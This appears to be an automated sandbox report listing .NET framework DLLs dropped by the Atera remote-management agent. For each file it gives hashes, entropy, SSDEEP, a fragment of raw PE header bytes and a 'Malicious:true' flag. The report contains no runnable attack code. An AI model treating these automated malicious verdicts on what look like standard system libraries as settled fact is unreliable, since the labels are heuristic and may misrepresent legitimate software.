                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............,... ...@....... ....................................@..................................,..O....@..................((...`.......+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H........A...............?..h...t+......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r;..p.(....*2ro..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rK..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2rM..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.809517252069014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:lzNnzx7FWjYW5mPVNyby2sE9jBF6IYiYF85S35IVnxGUHF8oymi9uJjxq:JRtRWjYWw9Nyb8E9VF6IYijSJIVxI6s
                                                                                                                                                                                                                                                                                                                                  MD5:97A9F3C2360358BE3349E16097E9D73A
                                                                                                                                                                                                                                                                                                                                  SHA1:606C65058A2C633CE83D2EC9511EE5A9002B91C4
                                                                                                                                                                                                                                                                                                                                  SHA-256:16D0F9CA09C1C3BC5EEAC2214C9BACCF1ECCE14231F871C78D4780FFD4018FDD
                                                                                                                                                                                                                                                                                                                                  SHA-512:4BDF1AFB3E2B1EEA7FFD60AB3DA8B7DC750B816527C61E02DAB5E56E07F801D5ED201C4D1BB0FE9DE2BED2ED347BC9A7A9683EE259A2037AD9951BB6E89D94E6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............*... ...@....... ....................................@.................................x*..O....@..@...............((...`......@)............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................*......H.......P ..p....................(......................................BSJB............v4.0.30319......l...@...#~..........#Strings....H.......#US.L.......#GUID...\.......#Blob......................3..................................................-.....-.........M...........[.................'.....@.................[.....*...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.9...K.Y...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8940313952760395
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:neWnoW7zNyb8E9VF6IYijSJIVxG1+MLJL:nnJvEpYi601M9L
                                                                                                                                                                                                                                                                                                                                  MD5:C72D7E80756E60B68B442E6C94702CDD
                                                                                                                                                                                                                                                                                                                                  SHA1:749714C526EF436C07FC357EED862A8C535357AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:5635955945C1B62469FAE0140F1CE88C952EC553695C660CCCCB3E2BD5AA9E23
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7DECBEE5B80B2C8C2EFAE5A1E5022F28607A7E843D76E353FFCC9BD0A296E237C9CECB0D9202426947926E57A478401F208AAF5F5EC453CF19653A03100B95E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................@.....@.................................X)..O....@..$...............((...`...... (............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................)......H.......P ..P....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings....,.......#US.0.......#GUID...@.......#Blob......................3......................................K.........]...........d.............o...".o...?.o.....o...}.o.....o.....o.....o.....h...-.o.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):99368
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.235971873079877
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:qeDoXrtUaK/XIg+rZAXj8s9HaWt9LuOw9VHHV55aTwWbaD763Yy:7itRK/XIgIZAXjD96WfLtGdM5baDk
                                                                                                                                                                                                                                                                                                                                  MD5:B42E45D54E35FCAABF9187D8A90E7172
                                                                                                                                                                                                                                                                                                                                  SHA1:B8FC2BAF89BCE708ABBAE8920BD2FF789BDC368A
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CC8FBB54B42D5A2F1FB762F3FC0E32087F966060873B12C66DDFFA6D63253E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:9BAC56E4E78911DD7A1F432E2C51F69C4B695F85DD2D37BC23A1F8E01CCF5512DA279FF3E0416D79CC7BAF3AEA89FB73A8C9F845E0DAC0E8C2B26BBDC93DB863
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.#..........." ..0..R...........o... ........... ..............................&.....`..................................o..O....................\..((...........n..T............................................ ............... ..H............text....P... ...R.................. ..`.rsrc................T..............@..@.reloc...............Z..............@..B.................o......H.......4................e.. ....n........................................{'...*:.((.....}'...*..0..#........u......,.()....{'....{'...o*...*.*v ..yN )UU.Z()....{'...o+...X*....0..:........r...p......%..{'......%q.........-.&.+.......o,....(-...*..{....*:.((.....}....*....0..#........u......,.()....{.....{....o*...*.*v ..:. )UU.Z()....{....o+...X*....0..:........r-..p......%..{.......%q.........-.&.+.......o,....(-...*..{/...*..{0...*V.((.....}/.....}0...*.0..;........u......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.853895198870055
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:HxGxIZWJjW5bPfNyby2sE9jBF6IYiYF85S35IVnxGUHFykNf8:H6oWJjWN3Nyb8E9VF6IYijSJIVxukh8
                                                                                                                                                                                                                                                                                                                                  MD5:FC2C441DB82E5F382DB12287A394885A
                                                                                                                                                                                                                                                                                                                                  SHA1:CC86E97F08DE132B787E67234970CDD7FDA3FB74
                                                                                                                                                                                                                                                                                                                                  SHA-256:2FA81C76B10779294E2413F62C0C516E318134A4E7B2B9BB28CB99606EE6B588
                                                                                                                                                                                                                                                                                                                                  SHA-512:5EAB8B7CB05A25A516581B9AA54C1B4E04C161E8ADB7AE2344A758BDC78326DF29F353603B9131514090E1F7FF0651516DD4435A2B6CAC522866DA2B542FE596
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ...............................d....@.................................H(..O....@..p...............((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B................|(......H.......P ..@....................&......................................BSJB............v4.0.30319......l...|...#~......(...#Strings............#US.........#GUID...$.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.$...C.?...K._...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.775604484973059
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:qqk53/hW3fZ+zWqyNyb8E9VF6IYijSJIVxjOY:qqk53MmSEpYi60n
                                                                                                                                                                                                                                                                                                                                  MD5:73E774B09489021BB1F6812915C392AA
                                                                                                                                                                                                                                                                                                                                  SHA1:2EE185AF44F271ED4441D96FBA63A927BDFCBF17
                                                                                                                                                                                                                                                                                                                                  SHA-256:539869DEF1EFDAF2C752CB67BCBB8E6D2F20AB429FCBBC9107427CEDD666D04A
                                                                                                                                                                                                                                                                                                                                  SHA-512:3B56CDF4760C99617EC3139D1226C659DD3E22E5830BF8976D2FD7FA13A23D5B939FCB6D36975196FCD2222B43557DC67119FCB543BD54B2FD38E012B3CC063F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............**... ...@....... ....................................@..................................)..O....@..0...............((...`.......(............................................... ............... ..H............text...0.... ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................*......H.......P ...................... (......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................j.q.........~.................}.....3.....L.................g.....P...................k.....k.....k...).k...1.k...9.k...A.k...I.k...Q.k...Y.k...a.k...i.k...q.k.......................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.658253651586789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8FCc4Y4OJWfOWqWWOW7yNyb8E9VF6IYijSJIVxwOCDQ:4CcyCrSEpYi60IQ
                                                                                                                                                                                                                                                                                                                                  MD5:045AD5D35B4E4D5FE7EE07336209A7D7
                                                                                                                                                                                                                                                                                                                                  SHA1:1733F1D1599FBECD38736F4CF7FC3A27655E7F2C
                                                                                                                                                                                                                                                                                                                                  SHA-256:F504090CD44CB0CC85CFA9D02DC9BA4F13190EE33F0F2180BBAE6AC3A31E511B
                                                                                                                                                                                                                                                                                                                                  SHA-512:3620F49E2576C8D4A28782B382126505D60BFB6239FE4700078A0F44B6DA10E941FECB373B258037FB8B386024D939618DA04BA3DACA5834DED77D27992B20AA
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............N.... ...@....... ..............................S1....@..................................-..O....@..................((...`......L-............................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0.......H........ ..4....................,......................................F.(....~....(....*6.o.....(....*6.o..........**.o.......*.~....*.~....*.BSJB............v4.0.30319......l.......#~..<.......#Strings.... .......#US.(.......#GUID...8.......#Blob...........GU.........3..................................................8.........*.h...m.h.....Z.....$...........Z...+.|.....Z...1.Z.....$.....$.......3.D.......|...F.|...c.|.....|.....|.....|.....|.....|.....Z...I.|...}.Z.....Z.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.876180794069439
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ylTx93aWxMW5XPqNyby2sE9jBF6IYiYF85S35IVnxGUHFwPtr0ZO2/:SAWxMWxiNyb8E9VF6IYijSJIVxMPtrC5
                                                                                                                                                                                                                                                                                                                                  MD5:A4B4CB5A8BB4B700A238E3D582BA55B6
                                                                                                                                                                                                                                                                                                                                  SHA1:D97C15B988D14185661194330332096E9DBB2CC4
                                                                                                                                                                                                                                                                                                                                  SHA-256:64E70764C3347FB573B3611B9DFC69F9E9A9F74B6BC3CBB74FAE2DEC8BF91CDF
                                                                                                                                                                                                                                                                                                                                  SHA-512:BA5E0B568269277EE586B27094B54D597F7EB158452F8FD61C4B3E97ED9FDFC6BA528AA626D123AC4A6D1DEBCE624AC56B04835EB134494E250A8FD1C500E0A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................F.....@..................................(..O....@..................((...`......L'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..|....................&......................................BSJB............v4.0.30319......l.......#~......P...#Strings....D.......#US.H.......#GUID...X...$...#Blob......................3......................................z...........!...\.!...0.....A.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.,...C.G...K.g...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.855207593147035
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:eYqArxbYWHaW5oPINyby2sE9jBF6IYiYF85S35IVnxGUHF2zfxGofDt:cAlcWHaWOQNyb8E9VF6IYijSJIVxyogt
                                                                                                                                                                                                                                                                                                                                  MD5:7AA08D1FC9FD614EBABD1587BACD0208
                                                                                                                                                                                                                                                                                                                                  SHA1:E2ED755FBC318FFC1EA8DA09CAC9A6C59E294E40
                                                                                                                                                                                                                                                                                                                                  SHA-256:D561C27FA407F7FB8881D1B22FF3A5DFE73C5702967717B8CE0BC3F84CC4DEE7
                                                                                                                                                                                                                                                                                                                                  SHA-512:E4D89FFB5AB2DA94942E05029E88D388C69B2D52726144CF9DFAA50D54707B2E33031DBBADB7061455B8967BB4E7A2361C1802C791D014FBE2D2C78E1F398C3B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ...............((...`......d'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......|...#Strings....p.......#US.t.......#GUID...........#Blob......................3............................................................`.....1.....t.................s.....).....B.................].........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.777959105060507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:3eIZnWlNWTaNyb8E9VF6IYijSJIVxpcst9hDY1:uUyo6EpYi60PrD8
                                                                                                                                                                                                                                                                                                                                  MD5:F673C2CD1065975DCE840DD1BD53FCA6
                                                                                                                                                                                                                                                                                                                                  SHA1:374B2384F27D30160A163E874830BB14B6E95E2D
                                                                                                                                                                                                                                                                                                                                  SHA-256:BD02CB7D6FFD969646B39CB03BC88885783266599B2158071EAC13CFFBFDF045
                                                                                                                                                                                                                                                                                                                                  SHA-512:29B761E29AD6F80D1466737D63799911D03F92F723DC84BF50945B3175B3C5854D8DB89B0B1DA99B53992B0E56EDFEE88F1859F8F0379CF1F8943A0FC0C69B13
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............2*... ...@....... ....................................@..................................)..O....@..P...............((...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...\...#~..........#Strings............#US.........#GUID...........#Blob......................3............................................................t...................................=.....V.................q.....Z...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.494434134843218
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:HlQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdWZ+Nyb8E9VF6h:FQq33333333kX+TBi8OGEpYi60/Q
                                                                                                                                                                                                                                                                                                                                  MD5:BADD2DC95335FC22E375925801945DCC
                                                                                                                                                                                                                                                                                                                                  SHA1:93E921C60B409CCB3819DA77A3F40DC8CDC3A24A
                                                                                                                                                                                                                                                                                                                                  SHA-256:257628371D79C0735D14CE3DCD6692D1619AAF9E81F0F67A00914F41402906BC
                                                                                                                                                                                                                                                                                                                                  SHA-512:CF7A6B781D351987AAAAAF3FB03BFB86BAC0A370E74F945A695F6307FF0A239B62B41FAECDBAFFB5737CE19D79EB02C39D46DB2DBC1A4F2497C504678E8BA5CD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.............RM... ...`....... ....................................@..................................L..O....`..x............<..((..........PL............................................... ............... ..H............text...X-... ...................... ..`.rsrc...x....`.......0..............@..@.reloc...............:..............@..B................3M......H.......8*...!...................K.......................................0..H........(.....-.r...ps....z.-.r...ps....z.(......}......(#...}.....{.....o....*"..(....*....0..Z.............%.r#..p.%..{.....%.rA..p.%..{..........%.rS..p.%..{....l.{....l[...ra..p(.....(....*&...{....*.0..4.................}......+....{.....".......X.....{.....i2.*.0..k..........{........{..........."....(.......X....{.....i.0%.(..........(.....(.......,..(........"....3.....}....*.......=..M......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.849353511209045
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:O28YFlXulWY/WGONyb8E9VF6IYijSJIVxKD9pMXL:O0qX2EpYi60xXL
                                                                                                                                                                                                                                                                                                                                  MD5:B1326E728AF4088C34C39F12FB6AD062
                                                                                                                                                                                                                                                                                                                                  SHA1:598F602AA4DA01504B10491077D7FAE1E9C00E93
                                                                                                                                                                                                                                                                                                                                  SHA-256:712BE0B967BDAFF22BB6AF5711E4F5709909817C7A0B8DDBA7C49EE2CFD7F08A
                                                                                                                                                                                                                                                                                                                                  SHA-512:0C790E8C762CA45D79E1A7F3F93A94D4F0EE2F6C96D647E4A8A493A18C180B07FAD5C3ADF5832964B43237D57069706868326572146F7FA3AD7AC41A425D92C6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............(... ...@....... ..............................mA....@..................................(..O....@.. ...............((...`......t'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~..,...P...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................~.....R..... .....f.................e...........4.....}...........O.....8...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.725896949380314
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RuMLcdQ5MW9MWYONyb8E9VF6IYijSJIVx3il19Q:4OcSpS2EpYi60219Q
                                                                                                                                                                                                                                                                                                                                  MD5:395811AF675274B00FA5418C8F89BE06
                                                                                                                                                                                                                                                                                                                                  SHA1:AEC3B97F7A8ADA1843689386CFDB04D211657E9D
                                                                                                                                                                                                                                                                                                                                  SHA-256:752D0B50F6FE140BAAF6099DDB1CC00CE384811B0E16A3BBC525392DF1D81833
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5F0A5AF70FD3AB57A7793725B4EB70ED4C0D89AD69D5233FC99FEB47A7D340286444871B181EF5677F7E9A7BF774A8EE8F61D71E0CD5F39605B35E85F5E53DB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............,... ...@....... ...................................@..................................+..O....@..................((...`.......*............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l.......#~..p...0...#Strings............#US.........#GUID...........#Blob......................3................................................;.........................$.....$.....$.....$...[.$...t.$.....$.....$.........g.$.....#...........e.....e.....e...).e...1.e...9.e...A.e...I.e...Q.e...Y.e...a.e...i.e...q.e.......................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.815124993644386
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:bZ7RqXWDRqlRqj0RqFWqENyb8E9VF6IYijSJIVxVa3f:t9qKqjqjuq5kEpYi60o
                                                                                                                                                                                                                                                                                                                                  MD5:685D2B6A982A10A7DE938DB20DF0D082
                                                                                                                                                                                                                                                                                                                                  SHA1:93FDAE4494901FF03DFB229F631FEB54CFA8337A
                                                                                                                                                                                                                                                                                                                                  SHA-256:915E28324C1F2F66A9A35DDA9AD763F82A3D1CC41C1BE5CC932DE23DB46AAEFB
                                                                                                                                                                                                                                                                                                                                  SHA-512:33EDFB53DC053AC7BE4F194FAABEBEA5C223E64D5038C7B3D5CACF7664F3F8E99EAF6759C28BC62E18572FC7F1A82ECF681C787551749CA321D3229EFDB18DD8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
